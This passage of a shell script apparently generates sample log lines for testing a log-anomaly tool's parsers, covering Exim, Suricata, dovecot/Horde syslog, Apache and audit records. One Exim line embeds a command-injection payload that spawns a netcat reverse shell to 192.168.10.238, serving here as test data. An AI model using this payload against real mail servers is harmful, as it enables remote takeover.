19:17:34 no host name found for IP address 192.168.10.238" >> $LOGFILE echo "2020-03-04 19:21:48 VRFY failed for boyce@cup.com H=(x) [192.168.10.238]" >> $LOGFILE echo "2020-03-04 19:25:08 1j9Zdk-00029d-Bi <= trula@mail.cup.com U=www-data P=local S=8714 id=20200304192508.Horde.g3OQpszuommgdrQpHrx6wIc@mail.cup.com" >> $LOGFILE echo "2020-03-04 19:25:08 1j9Zdk-00029d-Bi => irwin R=local_user T=mail_spool" >> $LOGFILE echo '2020-03-04 19:36:19 1j9ZoZ-0002Jk-9W ** ${run{\x2fbin\x2fsh\t-c\t\x22nc\t-e\t\x2fbin\x2fsh\t192.168.10.238\t9963\x22}}@localhost: Too many "Received" headers - suspected mail loop' >> $LOGFILE echo "2020-03-04 19:36:57 1j9ZpB-0002KN-QF Completed" >> $LOGFILE echo "2020-03-04 20:04:25 1j9ZoZ-0002Jk-9W Message is frozen" >> $LOGFILE echo "2020-03-04 19:38:19 1j9ZoZ-0002Jk-9W Frozen (delivery error message)" >> $LOGFILE ;; SuricataEventParsingModel) echo '{"timestamp":"2020-02-29T00:00:12.734324+0000","flow_id":914989792375924,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.154","src_port":53985,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":30266,"rrname":"190.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}}' > $LOGFILE echo '{"timestamp":"2020-02-29T00:00:14.000538+0000","flow_id":1357371404246463,"event_type":"flow","src_ip":"192.168.10.154","src_port":46289,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:55:12.974271+0000","end":"2020-02-28T23:55:13.085657+0000","age":1,"state":"established","reason":"timeout","alerted":false}}' >> $LOGFILE echo '{"timestamp":"2020-02-29T00:00:14.886252+0000","flow_id":149665274984610,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.190","src_port":39438,"dest_ip":"192.168.10.154","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.cup.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; 
Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.cup.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7326}}' >> $LOGFILE echo '{"timestamp":"2020-02-29T00:00:14.977952+0000","flow_id":149665274984610,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.154","src_port":80,"dest_ip":"192.168.10.190","dest_port":39438,"proto":"TCP","http":{"hostname":"mail.cup.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.cup.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7326},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":41080,"tx_id":1}}' >> $LOGFILE echo '{"timestamp":"2020-02-29T00:00:18.000491+0000","event_type":"stats","stats":{"uptime":17705,"capture":{"kernel_packets":337720,"kernel_drops":0},"decoder":{"pkts":337749,"bytes":229373623,"invalid":3062,"ipv4":335528,"ipv6":10,"ethernet":337749,"raw":0,"null":0,"sll":0,"tcp":317611,"udp":14805,"sctp":0,"icmpv4":50,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":679,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7104256},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":7155,"ssn_memcap_drop":0,"pseudo":1082,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":7418,"synack":7307,"rst":3226,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":375,"memuse":819200,"reassembly_memuse":12281632},"detect":{"a
lert":58},"app_layer":{"flow":{"http":4883,"ftp":0,"smtp":0,"tls":1564,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":258,"dcerpc_udp":0,"dns_udp":6951,"failed_udp":119},"tx":{"http":13248,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":7185}},"flow_mgr":{"closed_pruned":7112,"new_pruned":21,"est_pruned":6999,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":24462,"memcap_state":0,"memcap_global":0},"http":{"memuse":61601,"memcap":0}}}' >> $LOGFILE echo '{"timestamp":"2020-02-29T00:01:53.976648+0000","flow_id":378741657290945,"in_iface":"eth0","event_type":"tls","src_ip":"192.168.10.238","src_port":53156,"dest_ip":"192.168.10.154","dest_port":443,"proto":"TCP","tls":{"subject":"CN=mail.cup.com","issuerdn":"CN=ChangeMe","fingerprint":"12:7a:88:ea:52:10:62:44:f0:c5:33:8a:28:2d:ad:12:a1:4e:7e:18","sni":"mail.cup.com","version":"TLS 1.2","notbefore":"2020-02-28T18:40:23","notafter":"2030-02-25T18:40:23"}}' >> $LOGFILE echo '{"timestamp":"2020-02-29T06:11:02.147044+0000","flow_id":415686269975930,"in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":50850,"dest_ip":"192.168.10.154","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2012887,"rev":3,"signature":"ET POLICY Http Client Body contains pass= in cleartext","category":"Potential Corporate Privacy Violation","severity":1},"http":{"hostname":"mail.cup.com","url":"\/login.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.cup.com\/login.php","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"\/services\/portal\/","length":20}}' >> $LOGFILE ;; SuricataFastParsingModel) echo "02/29/2020-00:00:13.674931 [**] [1:2012887:3] ET POLICY Http 
Client Body contains pass= in cleartext [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 192.168.10.190:39438 -> 192.168.10.154:80" > $LOGFILE ;; SyslogParsingModel) echo "Feb 29 00:01:41 mail-0 dovecot: imap(kelsey): Logged out in=79 out=875" > $LOGFILE echo "Mar 1 06:25:38 mail dovecot: imap(lino): Error: Failed to autocreate mailbox INBOX: Internal error occurred. Refer to server log for more information. [2020-03-01 06:25:38]" >> $LOGFILE echo "Feb 29 00:01:44 mail-0 dovecot: imap(della): Error: file_dotlock_create(/var/mail/della) failed: Permission denied (euid=1013(della) egid=1013(della) missing +w perm: /var/mail, we're not in group 8(mail), dir owned by 0:8 mode=0775) (set mail_privileged_group=mail)" >> $LOGFILE echo "Mar 1 06:25:41 mail dovecot: imap(idella): Error: Failed to autocreate mailbox INBOX: Internal error occurred. Refer to server log for more information. [2020-03-01 06:25:41]" >> $LOGFILE echo "Mar 4 14:14:36 mail dovecot: imap-login: Disconnected (auth failed, 2 attempts in 12 secs): user=, method=PLAIN, rip=127.0.0.1, lip=127.0.0.1, secured, session=" >> $LOGFILE echo "Mar 4 18:43:05 mail dovecot: imap-login: Disconnected (no auth attempts in 0 secs): user=<>, rip=192.168.10.185, lip=192.168.10.177, session=" >> $LOGFILE echo "Mar 4 13:51:48 mail dovecot: imap-login: Disconnected (disconnected before auth was ready, waited 0 secs): user=<>, rip=192.168.10.18, lip=192.168.10.21, session=<+KO9uAeg4sPAqAoS>" >> $LOGFILE echo "Mar 4 18:43:59 mail dovecot: imap-login: Login: user=, method=PLAIN, rip=127.0.0.1, lip=127.0.0.1, mpid=11475, secured, session=<8ZitzQugnrh/AAAB>" >> $LOGFILE echo "Feb 29 11:39:45 mail-0 dovecot: imap-login: Error: anvil: Anvil queries timed out after 5 secs - aborting queries" >> $LOGFILE echo "Feb 29 09:15:59 mail-1 dovecot: imap-login: Warning: Auth process not responding, delayed sending initial response (greeting): user=<>, rip=127.0.0.1, lip=127.0.0.1, secured, session=" >> 
$LOGFILE echo "Feb 29 11:39:35 mail-2 dovecot: auth: Error: auth worker: Aborted PASSV request for marjory: Worker process died unexpectedly" >> $LOGFILE echo "Feb 29 11:39:35 mail-2 dovecot: auth-worker(2233): Fatal: Error reading configuration: Timeout reading config from /var/run/dovecot/config" >> $LOGFILE echo "Feb 29 11:39:35 mail-2 dovecot: master: Error: service(auth-worker): command startup failed, throttling for 2 secs" >> $LOGFILE echo 'Feb 29 11:39:46 mail-2 HORDE: [imp] Login success for marjory (192.168.10.18) to {imap://localhost/} [pid 1764 on line 156 of "/var/www/mail.insect.com/imp/lib/Auth.php"]' >> $LOGFILE echo 'Feb 29 17:18:23 mail-2 HORDE: [imp] Message sent to marcelle@mail.insect.com, merlene@mail.insect.com from les (192.168.10.18) [pid 9596 on line 970 of "/var/www/mail.insect.com/imp/lib/Compose.php"]' >> $LOGFILE echo 'Feb 29 20:01:48 mail-2 HORDE: [imp] FAILED LOGIN for violet (192.168.10.18) to {imap://localhost/} [pid 14794 on line 156 of "/var/www/mail.insect.com/imp/lib/Auth.php"]' >> $LOGFILE echo 'Mar 1 06:25:38 mail HORDE: [imp] [status] Could not open mailbox "INBOX". [pid 999 on line 730 of "/var/www/mail.onion.com/imp/lib/Imap.php"]' >> $LOGFILE echo 'Mar 1 06:27:56 mail HORDE: [imp] [getSyncToken] IMAP error reported by server. [pid 1127 on line 730 of "/var/www/mail.onion.com/imp/lib/Imap.php"]' >> $LOGFILE echo 'Feb 29 12:12:54 mail-2 HORDE: [horde] Login success for dorie to horde (192.168.10.18) [pid 2272 on line 163 of "/var/www/mail.insect.com/login.php"]' >> $LOGFILE echo 'Feb 29 12:13:00 mail-2 HORDE: [horde] User marjory logged out of Horde (192.168.10.18) [pid 2988 on line 106 of "/var/www/mail.insect.com/login.php"]' >> $LOGFILE echo 'Feb 29 17:07:07 mail-2 HORDE: [horde] FAILED LOGIN for marcelle to horde (192.168.10.98) [pid 8517 on line 198 of "/var/www/mail.insect.com/login.php"]' >> $LOGFILE echo 'Mar 1 18:22:40 mail HORDE: [imp] [login] Authentication failed. 
[pid 12890 on line 730 of "/var/www/mail.onion.com/imp/lib/Imap.php"]' >> $LOGFILE echo 'Mar 4 18:55:05 mail HORDE: [turba] PHP ERROR: finfo_file(): Empty filename or path [pid 11642 on line 166 of "/usr/share/php/Horde/Mime/Magic.php"]' >> $LOGFILE echo 'Mar 4 18:50:51 mail HORDE: [horde] PHP ERROR: Cannot modify header information - headers already sent [pid 11019 on line 0 of "Unknown"]' >> $LOGFILE echo 'Mar 4 18:01:23 mail HORDE: Guest user is not authorized for Horde (Host: 192.168.10.81). [pid 4815 on line 324 of "/usr/share/php/Horde/Registry.php"]' >> $LOGFILE echo 'Mar 4 18:10:08 mail HORDE: PHP ERROR: rawurlencode() expects parameter 1 to be string, array given [pid 6556 on line 302 of "/usr/share/php/Horde/Url.php"]' >> $LOGFILE # missing model/service/horde/horde/free_msg - no log found! echo "Feb 29 12:39:02 mail-0 CRON[11260]: (root) CMD ( [ -x /usr/lib/php/sessionclean ] && if [ ! -d /run/systemd/system ]; then /usr/lib/php/sessionclean; fi)" >> $LOGFILE echo "Feb 29 06:25:01 mail-1 CRON[27486]: pam_unix(cron:session): session opened for user root by (uid=0)" >> $LOGFILE echo "Feb 29 15:42:36 mail-1 auth: pam_unix(dovecot:auth): authentication failure; logname= uid=0 euid=0 tty=dovecot ruser=marcelino rhost=127.0.0.1 user=marcelino" >> $LOGFILE echo "Mar 1 03:09:18 mail-0 systemd[1]: Starting Clean php session files..." >> $LOGFILE echo "Mar 1 03:09:19 mail-0 systemd[1]: Started Clean php session files." >> $LOGFILE echo "Mar 1 18:26:18 mail systemd[1]: Starting Cleanup of Temporary Directories..." >> $LOGFILE echo "Mar 1 18:26:18 mail systemd[1]: Started Cleanup of Temporary Directories." >> $LOGFILE echo "Mar 2 06:37:52 mail systemd[1]: Starting Daily apt upgrade and clean activities..." >> $LOGFILE echo "Mar 2 06:37:53 mail systemd[1]: Started Daily apt upgrade and clean activities." >> $LOGFILE echo "Mar 2 12:30:18 mail systemd[1]: Starting Daily apt download activities..." 
>> $LOGFILE echo "Mar 2 12:30:19 mail systemd[1]: Started Daily apt download activities." >> $LOGFILE echo "Mar 3 06:29:00 mail systemd[1]: Starting Security Auditing Service..." >> $LOGFILE echo "Mar 3 06:29:00 mail systemd[1]: Started Security Auditing Service." >> $LOGFILE echo "Mar 4 06:29:05 mail systemd[1]: Stopping Security Auditing Service..." >> $LOGFILE echo "Mar 4 06:29:05 mail systemd[1]: Stopped Security Auditing Service." >> $LOGFILE echo "Mar 5 06:25:35 mail systemd[1]: Reloading The Apache HTTP Server." >> $LOGFILE echo "Mar 5 06:25:35 mail systemd[1]: Reloaded The Apache HTTP Server." >> $LOGFILE echo "Feb 29 11:52:32 mail-2 systemd[1]: Mounting Arbitrary Executable File Formats File System..." >> $LOGFILE echo "Feb 29 11:52:32 mail-2 systemd[1]: Mounted Arbitrary Executable File Formats File System." >> $LOGFILE echo "Feb 29 13:56:59 mail-2 systemd[1]: apt-daily.timer: Adding 6h 4min 46.743459s random time." >> $LOGFILE # missing model/service/systemd/service - no log found! echo "Feb 29 07:24:02 mail-0 kernel: [47678.309129] [] ? ret_from_fork+0x57/0x70" >> $LOGFILE echo "Mar 5 06:29:07 mail augenrules[17378]: backlog_wait_time 0" >> $LOGFILE echo "Mar 5 06:29:07 mail auditd[17377]: dispatch error reporting limit reached - ending report notification." 
>> $LOGFILE echo "Mar 5 06:29:07 mail auditd: audit log is not writable by owner" >> $LOGFILE echo "Mar 4 06:29:05 mail audispd: No plugins found, exiting" >> $LOGFILE echo 'Mar 3 06:29:01 mail liblogging-stdlog: [origin software="rsyslogd" swVersion="8.24.0" x-pid="480" x-info="http://www.rsyslog.com"] rsyslogd was HUPed' >> $LOGFILE echo "Mar 1 09:25:16 mail freshclam[22090]: Sun Mar 1 09:25:16 2020 -> bytecode.cvd is up to date (version: 331, sigs: 94, f-level: 63, builder: anvilleg)" >> $LOGFILE echo "Mar 1 07:26:09 mail dhclient[418]: DHCPREQUEST of 192.168.10.21 on eth0 to 192.168.10.2 port 67" >> $LOGFILE echo "Mar 1 00:59:38 mail-2 dhclient[387]: DHCPACK of 192.168.10.21 from 192.168.10.2" >> $LOGFILE echo "Feb 29 21:12:42 mail-2 dhclient[418]: bound to 192.168.10.21 -- renewal in 36807 seconds." >> $LOGFILE ;; AminerParsingModel) sudo cp ./demo/aminer/jsonConverterHandler-demo-config.py /tmp/demo-config.py sudo ./demo/aminer/aminerDemo.sh > $LOGFILE sed -i -e 1,2d $LOGFILE sed -i -e "/Generating data for the LinearNumericBinDefinition histogram report../d" $LOGFILE sed -i -e "/Generating data for the ModuloTimeBinDefinition histogram report../d" $LOGFILE sed -i "/^CPU Temp: /d" $LOGFILE sed -i "/^first$/d" $LOGFILE sed -i "/^second$/d" $LOGFILE sed -i "/^third$/d" $LOGFILE sed -i "/^fourth$/d" $LOGFILE cat >> $CONFIG_PATH < $LOGFILE echo '127.0.0.1 - - [01/May/2020:21:44:53 +0200] "GET /phpmyadmin/sql.php?server=1&db=seconlineportaldb&table=CONTRACT&pos=0 HTTP/1.1" 200 5326 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:75.0) Gecko/20100101 Firefox/75.0"' >> $LOGFILE echo '127.0.0.1 - - [01/Apr/2020:09:19:23 +0200] "GET /phpmyadmin/themes/pmahomme/img/b_drop.png HTTP/1.1" 304 180 "http://localhost/phpmyadmin/phpmyadmin.css.php?nocache=6340393753ltr&server=1" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:74.0) Gecko/20100101 Firefox/74.0"' >> $LOGFILE echo '111.222.333.123 HOME user1 [01/Feb/1998:01:08:39 -0800] "GET /bannerad/ad.htm HTTP/1.0" 200 198 
"http://www.referrer.com/bannerad/ba_intro.htm" "Mozilla/4.01 (Macintosh; I; PPC)"' >> $LOGFILE echo '::1 - - [31/Mar/2020:15:14:28 +0200] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.41 (Ubuntu) OpenSSL/1.1.1c (internal dummy connection)"' >> $LOGFILE echo '::1 - - [17/May/2015:10:05:03 +0000] "-" 200 203023' >> $LOGFILE echo '192.168.10.190 - - [29/Feb/2020:13:58:32 +0000] "GET /services/portal/ HTTP/1.1" 200 7499 "-" "-"' >> $LOGFILE echo '192.168.10.190 - - [29/Feb/2020:13:58:55 +0000] "POST /nag/task/save.php HTTP/1.1" 200 5220 "-" "-"' >> $LOGFILE echo 'www.google.com - - [29/Feb/2020:13:58:32 +0000] "GET /services/portal/ HTTP/1.1" 200 7499 "-" "-"' >> $LOGFILE ;; AudispdParsingModel) echo "audispd: type=ADD_GROUP msg=audit(1525173583.598:2104): pid=45406 uid=0 auid=0 ses=160 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 msg='op=adding group acct=\"raman\" exe=\"/usr/sbin/useradd\" hostname=? addr=? terminal=pts/1 res=success'" > $LOGFILE echo "audispd: type=ADD_USER msg=audit(1525173583.670:2105): pid=45406 uid=0 auid=0 ses=160 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 msg='op=adding user id=1003 exe=\"/usr/sbin/useradd\" hostname=? addr=? terminal=pts/1 res=success'" >> $LOGFILE echo "audispd: type=ADD_USER msg=audit(1525173583.677:2106): pid=45406 uid=0 auid=0 ses=160 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 msg='op=adding home directory id=1003 exe=\"/usr/sbin/useradd\" hostname=? addr=? 
terminal=pts/1 res=success'" >> $LOGFILE echo 'type=ANOM_ABEND msg=audit(1459467717.181:189187): auid=4294967295 uid=977 gid=2010 ses=4294967295 subj=system_u:system_r:unconfined_service_t:s0 pid=40239 comm="radiusd" reason="memory violation" sig=11' >> $LOGFILE echo 'audispd: type=ANOM_ABEND msg=audit(1459370041.594:534): auid=10000 uid=0 gid=0 ses=6 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 pid=3697 comm="sshd" reason="memory violation" sig=6' >> $LOGFILE echo "audispd: type=ANOM_ACCESS_FS msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=ANOM_ADD_ACCT msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=ANOM_AMTU_FAIL msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=ANOM_CRYPTO_FAIL msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=ANOM_DEL_ACCT msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=ANOM_EXEC msg=audit(1222174623.498:608): user pid=12965 uid=1 auid=2 ses=1 msg='op=PAM:unix_chkpwd acct=\"snap\" exe=\"/sbin/unix_chkpwd\" (hostname=?, addr=?, terminal=pts/0 res=failed)'" >> $LOGFILE echo "audispd: type=ANOM_LOGIN_ACCT msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=ANOM_LOGIN_FAILURES msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=ANOM_LOGIN_LOCATION msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=ANOM_LOGIN_SESSIONS msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=ANOM_LOGIN_TIME msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=ANOM_MAX_DAC msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=ANOM_MAX_MAC msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=ANOM_MK_EXEC msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=ANOM_MOD_ACCT msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=ANOM_PROMISCUOUS msg=audit(1390181243.575:738): dev=vethDvSeyL 
prom=256 old_prom=256 auid=4294967295 uid=0 gid=0 ses=4294967295" >> $LOGFILE echo "audispd: type=ANOM_RBAC_FAIL msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=ANOM_RBAC_INTEGRITY_FAIL msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=ANOM_ROOT_TRANS msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "type=AVC msg=audit(1226270358.848:238): avc: denied { write } for pid=13349 comm=\"certwatch\" name=\"cache\" dev=dm-0 ino=218171 scontext=system_u:system_r:certwatch_t:s0 tcontext=system_u:object_r:var_t:s0 tclass=dir" >> $LOGFILE echo "audispd: type=AVC_PATH msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo 'audispd: type=BPRM_FCAPS msg=audit(1583242318.512:13886958): fver=17474 fp=33 fi=4294967295 fe=4294967295 old_pp=message old_pi="apache2" old_pe="/usr/bin/bash" new_pp=(null) new_pi=(null) new_pe=(null)' >> $LOGFILE echo "type=CAPSET msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=CHGRP_ID msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=CHUSER_ID msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=CONFIG_CHANGE msg=audit(1368831799.081:466947): auid=4294967295 ses=4294967295 op=\"remove rule\" path=\"/path/to/my/bin0\" key=(null) list=4 res=1" >> $LOGFILE echo "type=CONFIG_CHANGE msg=audit(1479097266.018:224): auid=500 ses=2 op=\"updated_rules\" path=\"/etc/passwd\" key=\"passwd_changes\" list=4 res=1" >> $LOGFILE echo "audispd: type=CRED_ACQ msg=audit(1450894634.199:1276): pid=1956 uid=0 auid=4294967295 ses=4294967295 msg='op=PAM:setcred acct=\"root\" exe=\"/usr/sbin/sshd\" hostname=192.168.2.100 addr=192.168.2.100 terminal=ssh res=success'" >> $LOGFILE echo "audispd: type=CRED_DISP msg=audit(1450894635.111:1281): pid=1956 uid=0 auid=0 ses=213 msg='op=PAM:setcred acct=\"root\" exe=\"/usr/sbin/sshd\" hostname=192.168.2.100 addr=192.168.2.100 terminal=ssh res=success'" >> $LOGFILE echo "audispd: type=CRED_REFR 
msg=audit(1450894634.211:1279): pid=1958 uid=0 auid=0 ses=213 msg='op=PAM:setcred acct=\"root\" exe=\"/usr/sbin/sshd\" hostname=192.168.2.100 addr=192.168.2.100 terminal=ssh res=success'" >> $LOGFILE echo "audispd: type=CRYPTO_FAILURE_USER msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=CRYPTO_KEY_USER msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=CRYPTO_LOGIN msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=CRYPTO_LOGOUT msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=CRYPTO_PARAM_CHANGE_USER msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=CRYPTO_REPLAY_USER msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=CRYPTO_SESSION msg=audit(1150750972.008:3281471): user pid=1111 uid=0 auid=1111 msg='op=start direction=from-server cipher=aes128-ctr ksize=128 rport=40791 laddr=192.168.22.22 lport=22 id=4294967295 exe=\"/usr/sbin/sshd\" (hostname=?, addr=205.22.22.22, terminal=? res=success)'" >> $LOGFILE echo "audispd: type=CRYPTO_TEST_USER msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo 'audispd: type=CWD msg=audit(1450767416.248:3295858): cwd="/"' >> $LOGFILE echo "audispd: type=DAC_CHECK msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=DAEMON_ABORT msg=audit(1339336882.189:9206): auditd error halt, auid=4294967295 pid=3095 res=failed" >> $LOGFILE echo "audispd: type=DAEMON_ACCEPT msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=DAEMON_CLOSE msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=DAEMON_CONFIG msg=audit(1264985324.554:4915): auditd error getting hup info - no change, sending auid=? pid=? subj=? res=failed" >> $LOGFILE echo "audispd: type=DAEMON_END msg=audit(1450876093.165:8729): auditd normal halt, sending auid=0 pid=1 subj= res=success" >> $LOGFILE echo "audispd: type=DAEMON_RESUME msg=audit(1300385209.456:8846): auditd resuming logging, sending auid=? 
pid=? subj=? res=success" >> $LOGFILE echo "audispd: type=DAEMON_ROTATE msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=DAEMON_START msg=audit(1450875964.131:8728): auditd start, ver=2.4 format=raw kernel=3.16.0-4-amd64 auid=4294967295 pid=1437 res=failed" >> $LOGFILE echo "audispd: type=DEL_GROUP msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=DEL_USER msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=EOE msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo 'audispd: type=EXECVE msg=audit(1582934957.620:917519): argc=10 a0="find" a1="/usr/lib/php" a2="-mindepth" a3="1" a4="-maxdepth" a5="1" a6="-regex" a7=".*[0-9]\.[0-9]" a8="-printf" a9="%f\n"' >> $LOGFILE echo "audispd: type=FD_PAIR msg=audit(1431919799.945:49458): fd0=5 fd1=6" >> $LOGFILE echo "audispd: type=FS_RELABEL msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=GRP_AUTH msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=INTEGRITY_DATA msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=INTEGRITY_HASH msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=INTEGRITY_METADATA msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=INTEGRITY_PCR msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=INTEGRITY_RULE msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=INTEGRITY_STATUS msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=IPC msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=IPC_SET_PERM msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=KERNEL msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=KERNEL_OTHER msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=LABEL_LEVEL_CHANGE msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=LABEL_OVERRIDE msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo 
"audispd: type=LOGIN msg=audit(1450767601.778:3296208): login pid=15763 uid=0 old auid=4294967295 new auid=0 old ses=4294967295 new ses=2260" >> $LOGFILE echo "audispd: type=MAC_CIPSOV4_ADD msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MAC_CIPSOV4_DEL msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MAC_CONFIG_CHANGE msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MAC_IPSEC_EVENT msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MAC_MAP_ADD msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MAC_MAP_DEL msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MAC_POLICY_LOAD msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MAC_STATUS msg=audit(1336836093.835:406): enforcing=1 old_enforcing=0 auid=0 ses=2" >> $LOGFILE echo "audispd: type=MAC_UNLBL_ALLOW msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MAC_UNLBL_STCADD msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MAC_UNLBL_STCDEL msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MMAP msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MQ_GETSETATTR msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MQ_NOTIFY msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MQ_OPEN msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MQ_SENDRECV msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=NETFILTER_CFG msg=audit(1479622038.866:2): table=filter family=2 entries=0" >> $LOGFILE echo "audispd: type=NETFILTER_PKT msg=audit(1487874761.386:228): mark=0xae8a2732 saddr=127.0.0.1 daddr=127.0.0.1 proto=17" >> $LOGFILE echo "audispd: type=NETFILTER_PKT msg=audit(1487874761.381:227): mark=0x223894b7 saddr=::1 daddr=::1 proto=58" >> $LOGFILE echo "audispd: type=OBJ_PID msg=audit(1279134100.434:193): opid=1968 oauid=-1 ouid=0 oses=-1 obj= 
